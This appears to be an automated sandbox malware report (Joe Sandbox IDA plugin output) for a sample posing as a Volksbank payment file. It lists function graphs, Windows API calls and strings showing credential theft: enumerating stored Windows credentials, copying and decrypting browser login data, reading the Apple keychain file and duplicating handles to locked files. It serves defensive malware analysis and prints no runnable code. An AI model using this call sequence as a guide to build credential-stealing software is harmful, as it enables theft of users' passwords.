                                                                                                                                                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                          • API String ID: 1963886904-3798722523
                                                                                                                                                                                                                                          • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                                          Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                          • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                                          Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                                                          • String ID: chp$v10
                                                                                                                                                                                                                                          • API String ID: 1297422669-2783969131
                                                                                                                                                                                                                                          • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 504 40e2ab-40e2d5 call 40695d call 406b90 509 40e4a0-40e4af call 4069a3 504->509 510 40e2db-40e300 504->510 511 40e304-40e30f call 406e8f 510->511 515 40e314-40e316 511->515 516 40e476-40e483 call 406b53 515->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 515->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E3EC
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E407
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E422
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E43D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                                          • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                                          • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                            • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 0040E13E
